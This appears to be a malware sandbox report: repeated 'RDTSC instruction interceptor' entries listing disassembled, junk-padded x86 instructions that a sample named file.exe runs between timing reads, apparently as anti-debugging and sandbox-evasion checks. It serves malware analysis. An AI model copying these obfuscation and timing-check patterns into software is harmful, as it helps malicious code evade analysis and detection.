Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B05E0 second address: 53B05F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F84B0D655FAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B05F5 second address: 53B05FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53C0EEB second address: 53C0F49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65609h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ecx, 75BE8AA3h 0x00000010 jmp 00007F84B0D65608h 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a movzx ecx, dx 0x0000001d jmp 00007F84B0D65609h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53C0F49 second address: 53C0F80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 mov esi, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b jmp 00007F84B0B050E5h 0x00000010 mov ebp, esp 0x00000012 jmp 00007F84B0B050DEh 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53C0F80 second address: 53C0F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53C0F84 second address: 53C0FA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D0180 second address: 53D0212 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, bl 0x00000005 mov edi, eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c mov edi, ecx 0x0000000e mov esi, 5EC18A5Dh 0x00000013 popad 0x00000014 push eax 0x00000015 pushad 0x00000016 pushad 0x00000017 mov ax, dx 0x0000001a pushfd 0x0000001b jmp 00007F84B0D655FBh 0x00000020 or ax, 23CEh 0x00000025 jmp 00007F84B0D65609h 0x0000002a popfd 0x0000002b popad 0x0000002c call 00007F84B0D65600h 0x00000031 mov si, 72E1h 0x00000035 pop esi 0x00000036 popad 0x00000037 xchg eax, ebp 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b pushfd 0x0000003c jmp 00007F84B0D65609h 0x00000041 sub eax, 6C36A166h 0x00000047 jmp 00007F84B0D65601h 0x0000004c popfd 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53F06CC second address: 53F06F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d mov bh, C5h 0x0000000f popad 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 mov bl, cl 0x00000015 pushad 0x00000016 movsx edi, si 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53F06F7 second address: 53F07FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xchg eax, ecx 0x00000007 jmp 00007F84B0D65600h 0x0000000c push eax 0x0000000d jmp 00007F84B0D655FBh 0x00000012 xchg eax, ecx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F84B0D65604h 0x0000001a and si, 6BB8h 0x0000001f jmp 00007F84B0D655FBh 0x00000024 popfd 0x00000025 push ecx 0x00000026 pushfd 0x00000027 jmp 00007F84B0D655FFh 0x0000002c sub si, E57Eh 0x00000031 jmp 00007F84B0D65609h 0x00000036 popfd 0x00000037 pop esi 0x00000038 popad 0x00000039 mov eax, dword ptr [775F65FCh] 0x0000003e jmp 00007F84B0D65607h 0x00000043 test eax, eax 0x00000045 jmp 00007F84B0D65606h 0x0000004a je 00007F8522EE87B4h 0x00000050 jmp 00007F84B0D65600h 0x00000055 mov ecx, eax 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a pushad 0x0000005b popad 0x0000005c pushfd 0x0000005d jmp 00007F84B0D65603h 0x00000062 or eax, 29A6C24Eh 0x00000068 jmp 00007F84B0D65609h 0x0000006d popfd 0x0000006e popad 0x0000006f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53F07FA second address: 53F0800 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53F0800 second address: 53F0804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53F0804 second address: 53F086C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor eax, dword ptr [ebp+08h] 0x0000000b jmp 00007F84B0B050E4h 0x00000010 and ecx, 1Fh 0x00000013 pushad 0x00000014 movzx eax, di 0x00000017 push ebx 0x00000018 pushfd 0x00000019 jmp 00007F84B0B050E6h 0x0000001e sbb ax, F458h 0x00000023 jmp 00007F84B0B050DBh 0x00000028 popfd 0x00000029 pop esi 0x0000002a popad 0x0000002b ror eax, cl 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 jmp 00007F84B0B050E0h 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53F086C second address: 53F0871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53F0871 second address: 53F093B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a pushad 0x0000000b movzx ecx, bx 0x0000000e jmp 00007F84B0B050E9h 0x00000013 popad 0x00000014 retn 0004h 0x00000017 nop 0x00000018 mov esi, eax 0x0000001a lea eax, dword ptr [ebp-08h] 0x0000001d xor esi, dword ptr [00072014h] 0x00000023 push eax 0x00000024 push eax 0x00000025 push eax 0x00000026 lea eax, dword ptr [ebp-10h] 0x00000029 push eax 0x0000002a call 00007F84B5EC598Eh 0x0000002f push FFFFFFFEh 0x00000031 jmp 00007F84B0B050DEh 0x00000036 pop eax 0x00000037 jmp 00007F84B0B050E0h 0x0000003c ret 0x0000003d nop 0x0000003e push eax 0x0000003f call 00007F84B5EC59A9h 0x00000044 mov edi, edi 0x00000046 jmp 00007F84B0B050E0h 0x0000004b xchg eax, ebp 0x0000004c pushad 0x0000004d mov si, 136Dh 0x00000051 call 00007F84B0B050DAh 0x00000056 mov di, cx 0x00000059 pop ecx 0x0000005a popad 0x0000005b push eax 0x0000005c jmp 00007F84B0B050DCh 0x00000061 xchg eax, ebp 0x00000062 jmp 00007F84B0B050E0h 0x00000067 mov ebp, esp 0x00000069 jmp 00007F84B0B050E0h 0x0000006e pop ebp 0x0000006f push eax 0x00000070 push edx 0x00000071 jmp 00007F84B0B050E7h 0x00000076 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53F093B second address: 53F0941 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53F0941 second address: 53F0945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53A0070 second address: 53A00A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F84B0D65603h 0x0000000a xor ecx, 3DB4BEAEh 0x00000010 jmp 00007F84B0D65609h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53A00A9 second address: 53A0144 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F84B0B050E7h 0x00000009 add ch, FFFFFFBEh 0x0000000c jmp 00007F84B0B050E9h 0x00000011 popfd 0x00000012 mov edi, esi 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 and esp, FFFFFFF8h 0x0000001a pushad 0x0000001b push edi 0x0000001c call 00007F84B0B050E2h 0x00000021 pop esi 0x00000022 pop ebx 0x00000023 popad 0x00000024 xchg eax, ecx 0x00000025 jmp 00007F84B0B050DEh 0x0000002a push eax 0x0000002b pushad 0x0000002c mov edi, 0D8345C4h 0x00000031 push edx 0x00000032 mov dl, cl 0x00000034 pop ebx 0x00000035 popad 0x00000036 xchg eax, ecx 0x00000037 jmp 00007F84B0B050E0h 0x0000003c xchg eax, ebx 0x0000003d jmp 00007F84B0B050E0h 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53A0144 second address: 53A0148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53A0148 second address: 53A014C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53A014C second address: 53A0152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53A0152 second address: 53A0158 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53A0158 second address: 53A015C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53A015C second address: 53A018A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 jmp 00007F84B0B050DDh 0x0000000e mov ebx, dword ptr [ebp+10h] 0x00000011 jmp 00007F84B0B050DEh 0x00000016 xchg eax, esi 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53A018A second address: 53A018E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53A018E second address: 53A0194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53A0194 second address: 53A0199 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53A0199 second address: 53A01CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx eax, di 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F84B0B050DFh 0x00000014 jmp 00007F84B0B050E3h 0x00000019 popfd 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53A01CD second address: 53A01D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53A01D2 second address: 53A0205 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 mov eax, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b pushad 0x0000000c mov cx, dx 0x0000000f mov eax, edi 0x00000011 popad 0x00000012 mov esi, dword ptr [ebp+08h] 0x00000015 jmp 00007F84B0B050E7h 0x0000001a xchg eax, edi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53A0205 second address: 53A0209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53A0209 second address: 53A020D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53A020D second address: 53A0213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53A0213 second address: 53A02C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov bx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F84B0B050DBh 0x00000011 xchg eax, edi 0x00000012 jmp 00007F84B0B050E6h 0x00000017 test esi, esi 0x00000019 jmp 00007F84B0B050E0h 0x0000001e je 00007F8522CD3498h 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F84B0B050DEh 0x0000002b xor ax, BD78h 0x00000030 jmp 00007F84B0B050DBh 0x00000035 popfd 0x00000036 pushfd 0x00000037 jmp 00007F84B0B050E8h 0x0000003c jmp 00007F84B0B050E5h 0x00000041 popfd 0x00000042 popad 0x00000043 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000004a pushad 0x0000004b mov edi, esi 0x0000004d mov edx, eax 0x0000004f popad 0x00000050 je 00007F8522CD344Ah 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a popad 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53A02C2 second address: 53A0307 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D655FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov edx, dword ptr [esi+44h] 0x0000000d jmp 00007F84B0D65607h 0x00000012 or edx, dword ptr [ebp+0Ch] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F84B0D65605h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390786 second address: 539078C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 539078C second address: 5390790 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390790 second address: 53907D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F84B0B050E6h 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 movzx eax, di 0x00000013 movsx edi, si 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 jmp 00007F84B0B050E2h 0x0000001e and esp, FFFFFFF8h 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 push edx 0x00000025 pop ecx 0x00000026 mov ecx, edx 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53907D7 second address: 539083A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65602h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F84B0D65600h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov dx, 2454h 0x00000015 mov edx, 1F5531C0h 0x0000001a popad 0x0000001b xchg eax, ebx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushfd 0x00000020 jmp 00007F84B0D655FBh 0x00000025 sub eax, 484172EEh 0x0000002b jmp 00007F84B0D65609h 0x00000030 popfd 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 539083A second address: 53908FC instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 call 00007F84B0B050DDh 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f popad 0x00000010 push ecx 0x00000011 jmp 00007F84B0B050DAh 0x00000016 mov dword ptr [esp], esi 0x00000019 jmp 00007F84B0B050E0h 0x0000001e mov esi, dword ptr [ebp+08h] 0x00000021 jmp 00007F84B0B050E0h 0x00000026 sub ebx, ebx 0x00000028 pushad 0x00000029 call 00007F84B0B050E7h 0x0000002e mov esi, 6EC8DC1Fh 0x00000033 pop esi 0x00000034 movsx edx, cx 0x00000037 popad 0x00000038 test esi, esi 0x0000003a pushad 0x0000003b call 00007F84B0B050DAh 0x00000040 pop edx 0x00000041 pushfd 0x00000042 jmp 00007F84B0B050DEh 0x00000047 sub ecx, 0C7A4CB8h 0x0000004d jmp 00007F84B0B050DBh 0x00000052 popfd 0x00000053 popad 0x00000054 je 00007F8522CDAB8Dh 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d mov si, dx 0x00000060 call 00007F84B0B050E7h 0x00000065 pop eax 0x00000066 popad 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53908FC second address: 5390902 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390902 second address: 5390918 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov eax, edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390918 second address: 539091D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 539091D second address: 5390923 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390923 second address: 5390927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390927 second address: 53909BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, esi 0x0000000a jmp 00007F84B0B050E6h 0x0000000f je 00007F8522CDAB32h 0x00000015 pushad 0x00000016 mov dl, cl 0x00000018 push edi 0x00000019 pushfd 0x0000001a jmp 00007F84B0B050E6h 0x0000001f adc ecx, 35E75638h 0x00000025 jmp 00007F84B0B050DBh 0x0000002a popfd 0x0000002b pop eax 0x0000002c popad 0x0000002d test byte ptr [775F6968h], 00000002h 0x00000034 jmp 00007F84B0B050DFh 0x00000039 jne 00007F8522CDAAFAh 0x0000003f pushad 0x00000040 movzx esi, dx 0x00000043 mov ecx, ebx 0x00000045 popad 0x00000046 mov edx, dword ptr [ebp+0Ch] 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007F84B0B050E6h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53909BA second address: 53909CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F84B0D655FEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53909CC second address: 53909D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53909D0 second address: 53909DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53909DF second address: 53909E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53909E5 second address: 5390A09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F84B0D65605h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390A09 second address: 5390A0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390A0F second address: 5390A13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390A13 second address: 5390A54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007F84B0B050E2h 0x00000015 xor si, 3948h 0x0000001a jmp 00007F84B0B050DBh 0x0000001f popfd 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390A54 second address: 5390A74 instructions: 0x00000000 rdtsc 0x00000002 mov edi, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movzx eax, di 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F84B0D655FEh 0x00000010 xchg eax, ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390A74 second address: 5390A78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390A78 second address: 5390A7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390A7C second address: 5390A82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390B2F second address: 5390B43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov esp, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F84B0D655FAh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390B43 second address: 5390B55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F84B0B050DEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53A0D16 second address: 53A0D1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53A0D1B second address: 53A0D21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53A0D21 second address: 53A0D25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53A0D25 second address: 53A0D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F84B0B050E8h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53A0D48 second address: 53A0D89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D655FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F84B0D65606h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F84B0D65607h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53A0AB1 second address: 53A0AEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov al, bh 0x0000000d movzx eax, di 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F84B0B050DBh 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push ebx 0x0000001d pop ecx 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54207B2 second address: 54207B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5410A32 second address: 5410A49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5410A49 second address: 5410A8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65609h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F84B0D655FEh 0x0000000f mov ebp, esp 0x00000011 jmp 00007F84B0D65600h 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5410A8E second address: 5410A94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 541086C second address: 5410872 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
